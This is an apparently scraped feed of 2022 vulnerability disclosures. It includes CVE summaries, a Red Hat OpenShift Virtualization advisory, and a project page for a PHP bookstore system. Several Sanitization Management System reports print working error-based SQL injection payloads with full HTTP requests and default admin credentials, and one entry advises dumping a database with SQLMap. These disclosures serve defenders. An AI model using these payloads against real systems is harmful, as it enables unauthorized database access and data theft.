A vulnerability has been found in House Rental System and classified as critical. Affected by this vulnerability is an unknown functionality of the file search-property.php of the component POST Request Handler. The manipulation of the argument search_property leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214771.

CVE-2022-4275

A vulnerability, which was classified as critical, was found in House Rental System. Affected is an unknown function of the file /view-property.php. The manipulation of the argument property_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-214770 is the identifier assigned to this vulnerability.

CVE-2022-4274

Rukovoditel v3.2.1 was discovered to contain a SQL injection vulnerability via the heading_field_id parameter.

**Version: 3.2.1****Description**

The heading\_field\_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the heading\_field\_id parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared.

**Proof of Concept******Step 1:** Add single quote was submitted in the heading\_field\_id parameter, and a database error message was returned.**********Step 2:** Then add two quotes and submit the request, the error message disappears.**********Step 3:** Use SQLMap to dump full database.********Impact**

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.  
A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.

CVE-2022-44945: SQL injection Vulnerability on "heading_field_id" in rukovoditel 3.2.1 · Issue #16 · anhdq201/rukovoditel

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/orders/update_status.php?id=.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: BGP-OSPF

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/admin/orders/update\_status.php?id=

Vulnerability location: /php-sms/admin/orders/update\_status.php?id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/orders/update\_status.php?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/orders/update\_status.php?id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44348: bug_report/SQLi-3.md at main · BGP-OSPF/bug_report

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/?page=inquiries/view_inquiry&id=.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: BGP-OSPF

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/admin/?page=inquiries/view\_inquiry&id=

Vulnerability location: /php-sms/admin/?page=inquiries/view\_inquiry&id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=inquiries/view\_inquiry&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/?page\=inquiries/view\_inquiry&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44347: bug_report/SQLi-2.md at main · BGP-OSPF/bug_report

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/?page=quotes/view_quote&id=.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: BGP-OSPF

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmappA-php8.1 version

Vulnerability File: /php-sms/admin/?page=quotes/view\_quote&id=

Vulnerability location: /php-sms/admin/?page=quotes/view\_quote&id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=quotes/view\_quote&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/?page\=quotes/view\_quote&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44345: bug_report/SQLi-1.md at main · BGP-OSPF/bug_report

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/classes/Master.php?f=delete_product.

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Lee

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Execute the following statement to create the "product\_list" table

CREATE TABLE \`product\_list\` (
  \`id\` int(11) NOT NULL
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /php-sms/classes/Master.php?f=delete\_product

Vulnerability location: /php-sms/classes/Master.php?f=delete\_product, id

dbname =sms\_db,length=6

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /php\-sms/classes/Master.php?f\=delete\_product HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/php-sms/admin/?page=services
Content-Length: 65
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-44277: bug_report/SQLi-1.md at main · llwyx200113/bug_report

Red Hat Security Advisory 2022-8750-01 - OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. Issues addressed include denial of service and out of bounds read vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Virtualization 4.11.1 security and bug fix update  
Advisory ID:       RHSA-2022:8750-01  
Product:           cnv  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8750  
Issue date:        2022-12-01  
CVE Names:         CVE-2015-20107 CVE-2016-3709 CVE-2020-0256  
                   CVE-2020-35525 CVE-2020-35527 CVE-2021-0308  
                   CVE-2021-38561 CVE-2022-0391 CVE-2022-0934  
                   CVE-2022-1292 CVE-2022-1304 CVE-2022-1586  
                   CVE-2022-1785 CVE-2022-1897 CVE-2022-1927  
                   CVE-2022-2068 CVE-2022-2097 CVE-2022-2509  
                   CVE-2022-3515 CVE-2022-22624 CVE-2022-22628  
                   CVE-2022-22629 CVE-2022-22662 CVE-2022-24675  
                   CVE-2022-24795 CVE-2022-24921 CVE-2022-25308  
                   CVE-2022-25309 CVE-2022-25310 CVE-2022-26700  
                   CVE-2022-26709 CVE-2022-26710 CVE-2022-26716  
                   CVE-2022-26717 CVE-2022-26719 CVE-2022-27404  
                   CVE-2022-27405 CVE-2022-27406 CVE-2022-28327  
                   CVE-2022-29154 CVE-2022-30293 CVE-2022-30629  
                   CVE-2022-30698 CVE-2022-30699 CVE-2022-32206  
                   CVE-2022-32208 CVE-2022-34903 CVE-2022-37434  
                   CVE-2022-38177 CVE-2022-38178 CVE-2022-40674  
====================================================================  
1. Summary:

Red Hat OpenShift Virtualization release 4.11.1 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

OpenShift Virtualization is Red Hat's virtualization solution designed for  
Red Hat OpenShift Container Platform.

Security Fix(es):

* golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
(CVE-2021-38561)

* golang: encoding/pem: fix stack overflow in Decode (CVE-2022-24675)

* golang: regexp: stack exhaustion via a deeply nested expression  
(CVE-2022-24921)

* golang: crypto/elliptic: panic caused by oversized scalar  
(CVE-2022-28327)

* golang: crypto/tls: session tickets lack random ticket_age_add  
(CVE-2022-30629)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Cloning a Block DV to VM with Filesystem with not big enough size comes  
to endless loop - using pvc api (BZ#2033191)

* Restart of VM Pod causes SSH keys to be regenerated within VM  
(BZ#2087177)

* Import gzipped raw file causes image to be downloaded and uncompressed to  
TMPDIR (BZ#2089391)

* [4.11] VM Snapshot Restore hangs indefinitely when backed by a  
snapshotclass (BZ#2098225)

* Fedora version in DataImportCrons is not 'latest' (BZ#2102694)

* [4.11] Cloned VM's snapshot restore fails if the source VM disk is  
deleted (BZ#2109407)

* CNV introduces a compliance check fail in "ocp4-moderate" profile -  
routes-protected-by-tls (BZ#2110562)

* Nightly build: v4.11.0-578: index format was changed in 4.11 to  
file-based instead of sqlite-based (BZ#2112643)

* Unable to start windows VMs on PSI setups (BZ#2115371)

* [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity  
restricted:v1.24 (BZ#2128997)

* Mark Windows 11 as TechPreview (BZ#2129013)

* 4.11.1 rpms (BZ#2139453)

This advisory contains the following OpenShift Virtualization 4.11.1  
images.

RHEL-8-CNV-4.11

virt-cdi-operator-container-v4.11.1-5  
virt-cdi-uploadserver-container-v4.11.1-5  
virt-cdi-apiserver-container-v4.11.1-5  
virt-cdi-importer-container-v4.11.1-5  
virt-cdi-controller-container-v4.11.1-5  
virt-cdi-cloner-container-v4.11.1-5  
virt-cdi-uploadproxy-container-v4.11.1-5  
checkup-framework-container-v4.11.1-3  
kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.1-7  
kubevirt-tekton-tasks-create-datavolume-container-v4.11.1-7  
kubevirt-template-validator-container-v4.11.1-4  
virt-handler-container-v4.11.1-5  
hostpath-provisioner-operator-container-v4.11.1-4  
virt-api-container-v4.11.1-5  
vm-network-latency-checkup-container-v4.11.1-3  
cluster-network-addons-operator-container-v4.11.1-5  
virtio-win-container-v4.11.1-4  
virt-launcher-container-v4.11.1-5  
ovs-cni-marker-container-v4.11.1-5  
hyperconverged-cluster-webhook-container-v4.11.1-7  
virt-controller-container-v4.11.1-5  
virt-artifacts-server-container-v4.11.1-5  
kubevirt-tekton-tasks-modify-vm-template-container-v4.11.1-7  
kubevirt-tekton-tasks-disk-virt-customize-container-v4.11.1-7  
libguestfs-tools-container-v4.11.1-5  
hostpath-provisioner-container-v4.11.1-4  
kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.1-7  
kubevirt-tekton-tasks-copy-template-container-v4.11.1-7  
cnv-containernetworking-plugins-container-v4.11.1-5  
bridge-marker-container-v4.11.1-5  
virt-operator-container-v4.11.1-5  
hostpath-csi-driver-container-v4.11.1-4  
kubevirt-tekton-tasks-create-vm-from-template-container-v4.11.1-7  
kubemacpool-container-v4.11.1-5  
hyperconverged-cluster-operator-container-v4.11.1-7  
kubevirt-ssp-operator-container-v4.11.1-4  
ovs-cni-plugin-container-v4.11.1-5  
kubevirt-tekton-tasks-cleanup-vm-container-v4.11.1-7  
kubevirt-tekton-tasks-operator-container-v4.11.1-2  
cnv-must-gather-container-v4.11.1-8  
kubevirt-console-plugin-container-v4.11.1-9  
hco-bundle-registry-container-v4.11.1-49

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2033191 - Cloning a Block DV to VM with Filesystem with not big enough size comes to endless loop - using pvc api  
2064857 - CVE-2022-24921 golang: regexp: stack exhaustion via a deeply nested expression  
2070772 - When specifying pciAddress for several SR-IOV NIC they are not correctly propagated to libvirt XML  
2077688 - CVE-2022-24675 golang: encoding/pem: fix stack overflow in Decode  
2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar  
2087177 - Restart of VM Pod causes SSH keys to be regenerated within VM  
2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR  
2091856 - ?Edit BootSource? action should have more explicit information when disabled  
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add  
2098225 - [4.11] VM Snapshot Restore hangs indefinitely when backed by a snapshotclass  
2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS  
2102694 - Fedora version in DataImportCrons is not 'latest'  
2109407 - [4.11] Cloned VM's snapshot restore fails if the source VM disk is deleted  
2110562 - CNV introduces a compliance check fail in "ocp4-moderate" profile - routes-protected-by-tls  
2112643 - Nightly build: v4.11.0-578: index format was changed in 4.11 to file-based instead of sqlite-based  
2115371 - Unable to start windows VMs on PSI setups  
2119613 - GiB changes to B in Template's Edit boot source reference modal  
2128554 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass  
2128872 - [4.11]Can't restore cloned VM  
2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24  
2129013 - Mark Windows 11 as TechPreview  
2129235 - [RFE] Add "Copy SSH command" to VM action list  
2134668 - Cannot edit ssh even vm is stopped  
2139453 - 4.11.1 rpms

5. References:

https://access.redhat.com/security/cve/CVE-2015-20107  
https://access.redhat.com/security/cve/CVE-2016-3709  
https://access.redhat.com/security/cve/CVE-2020-0256  
https://access.redhat.com/security/cve/CVE-2020-35525  
https://access.redhat.com/security/cve/CVE-2020-35527  
https://access.redhat.com/security/cve/CVE-2021-0308  
https://access.redhat.com/security/cve/CVE-2021-38561  
https://access.redhat.com/security/cve/CVE-2022-0391  
https://access.redhat.com/security/cve/CVE-2022-0934  
https://access.redhat.com/security/cve/CVE-2022-1292  
https://access.redhat.com/security/cve/CVE-2022-1304  
https://access.redhat.com/security/cve/CVE-2022-1586  
https://access.redhat.com/security/cve/CVE-2022-1785  
https://access.redhat.com/security/cve/CVE-2022-1897  
https://access.redhat.com/security/cve/CVE-2022-1927  
https://access.redhat.com/security/cve/CVE-2022-2068  
https://access.redhat.com/security/cve/CVE-2022-2097  
https://access.redhat.com/security/cve/CVE-2022-2509  
https://access.redhat.com/security/cve/CVE-2022-3515  
https://access.redhat.com/security/cve/CVE-2022-22624  
https://access.redhat.com/security/cve/CVE-2022-22628  
https://access.redhat.com/security/cve/CVE-2022-22629  
https://access.redhat.com/security/cve/CVE-2022-22662  
https://access.redhat.com/security/cve/CVE-2022-24675  
https://access.redhat.com/security/cve/CVE-2022-24795  
https://access.redhat.com/security/cve/CVE-2022-24921  
https://access.redhat.com/security/cve/CVE-2022-25308  
https://access.redhat.com/security/cve/CVE-2022-25309  
https://access.redhat.com/security/cve/CVE-2022-25310  
https://access.redhat.com/security/cve/CVE-2022-26700  
https://access.redhat.com/security/cve/CVE-2022-26709  
https://access.redhat.com/security/cve/CVE-2022-26710  
https://access.redhat.com/security/cve/CVE-2022-26716  
https://access.redhat.com/security/cve/CVE-2022-26717  
https://access.redhat.com/security/cve/CVE-2022-26719  
https://access.redhat.com/security/cve/CVE-2022-27404  
https://access.redhat.com/security/cve/CVE-2022-27405  
https://access.redhat.com/security/cve/CVE-2022-27406  
https://access.redhat.com/security/cve/CVE-2022-28327  
https://access.redhat.com/security/cve/CVE-2022-29154  
https://access.redhat.com/security/cve/CVE-2022-30293  
https://access.redhat.com/security/cve/CVE-2022-30629  
https://access.redhat.com/security/cve/CVE-2022-30698  
https://access.redhat.com/security/cve/CVE-2022-30699  
https://access.redhat.com/security/cve/CVE-2022-32206  
https://access.redhat.com/security/cve/CVE-2022-32208  
https://access.redhat.com/security/cve/CVE-2022-34903  
https://access.redhat.com/security/cve/CVE-2022-37434  
https://access.redhat.com/security/cve/CVE-2022-38177  
https://access.redhat.com/security/cve/CVE-2022-38178  
https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY4lNCdzjgjWX9erEAQhXxhAAjaag4e7jIpQLpc0kJhc/hn59M4UIxn8v  
a1L+lD58IrBfY3KAtSAK0t3ei92Lyf8LCJqm027yGlIskeCV91vkO9ZpJhPfRasU  
u1a8Uhd/5F6caB0xUPX26vyCyksalw17CNmLWh5wd2izhkOGctkgVD7LhsVzXbFh  
tIomeVp/hVwW9ILX03ijss27E6m2ZUczgWmuNpviqW8WRFMUw3ZM+1MxnSDHxURe  
H28dsj2l7nrshdBGrZeuj2HBoA0/x3Vsc2jiXfP8nt7LcQ/pb1DN4MYo6lAAEVkC  
O2LlzTAzw/3MAGofaRinyHZD2aoqicPqooUIQglBbF6cvYAUrMtxRCwKcZOckE3d  
F2exKjihBY3JeLlsjpWXBe0yAhdwse7j0oovNL2uQH1imUr7Y1pXVlJqeDzHkzME  
MIRKzuuTGJe1D9Av4S8R+W5eT7iXBAH7x9Lia1NFxeflemVQbyr8ayEMLcmiDuyj  
xMKYFFpW9GmplZlCnDaG5lxKu8ZbOkRzanaLeLn+G5j1+1w9Y9wGtlXJIHV6gmfC  
Wk33MBCpqCGg1Wz+SlXJCtksnYmvKdzn79b2HInvPJtndDQ/VidcN2MuJfkYe688  
2m3FYMI0ehPummvv3iGXLz5ku6gD6y0qNhNWC6HM+hLNnPvvukXXcFgCyonJuv0I  
AqwDoKa8myM=pIHc  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8750-01

A cross-site scripting (XSS) vulnerability in Book Store Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter under the Add New System User module.

Submitted by oretnom23 on Tuesday, October 11, 2022 - 13:26.

****Introduction****

This project is entitled **Book Store Management System**. It is a **CodeIgniter Project** application that aims to provide an automated online platform for bookstores to manage their sales transactions and records. It has a simple and pleasant user interface using **Bootstrap Framework**. It consists of user-friendly features and functionalities.

****What is CodeIgniter?****

**CodeIgniter** is a web development framework for creating dynamic websites or web apps. This framework makes use of PHP. It is a lightweight **PHP** framework that is incredibly powerful and has a number of modules that are very useful when creating a web application from scratch.

****Technologies****

Here is the list of the technologies used for developing this **Book Store Management System**:

*   **PHP**
*   **CodeIgniter 3 Framework**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **jQuery**
*   **Bootstrap**
*   **DataTables**

****Features and Functionalities****

This **Book Store Management System** is consist of the following features and functionalities:

****Admin****

*   **Login and Registration**
*   **Dashboard Page**
*   **Category Management (CRUD)**
*   **Book Management (CRUD)**
*   **Create Sales Transaction**
*   **Cart List**
*   **Manage/Update Cart List**
*   **Print Receipt**
*   **List All Transaction History**
*   **User Management (CRUD)**
*   **Logout**

****Cashier****

*   **Login and Registration**
*   **Dashboard Page**
*   **Create Sales Transaction**
*   **Cart List**
*   **Manage/Update Cart List**
*   **Print Receipt**
*   **Logout**

****How does the Book Store Management System work?****

The **Book Store Management System** in **CodeIgniter Project** is only accessible to the store's management. It contains 2 types of user roles which are the **Administrators** and the **Cashiers**. The admin users have permission to access and manage all the data on the system including the list of the book categories, books, and users. The cashier users are only allowed to create transactions with the customer. This application also generates a printable sales transaction receipt.

****Snapshots****

Here are some snapshots of the pages that can be found in this **Book Store Management System**

****Login Page****

****Admin Dashboard Page****

****Book List Page****

****Sales Transaction****

The **Book Store Management System in CodeIgniter Project** source codes is free to download on this website. Feel free to download and modify the project the way you desire to meet your requirement. Follow the instructions below to run this **CodeIgniter** project.

**How to Run?**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)

****System Installation/Setup****

1.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
2.  **Extract** the **downloaded source code **zip** file**.
3.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
4.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
5.  **Create** a **new database** named ****ci\_bsms\_db****.
6.  **Import** the provided ****SQL**** file. The file is known as ****ci\_bsms\_db.sql**** located inside the **database** folder.
7.  **Browse** the **Book Store Management System** in a **browser**. i.e. ****http://localhost/bsms\_ci/****.

****Admin Access****

Username: **admin**  
Password **admin#123**

****DEMO VIDEO****

That's it! I hope this **Book Store Management System** in **PHP** and **CodeIgniter Framework** project helps you with what you are looking for and that you'll find something useful for your current or future **PHP Projects**.

Explore more on this website for more **Tutorials** and **Free Source Codes**.

****Enjoy :)****

*   3488 views

CVE-2022-45215: Book Store Management System Project using PHP CodeIgniter 3 Free Source Code

Algan YazÄ±lÄ±m Prens Student Information System product has an unauthenticated SQL Injection vulnerability.

Tag

#sql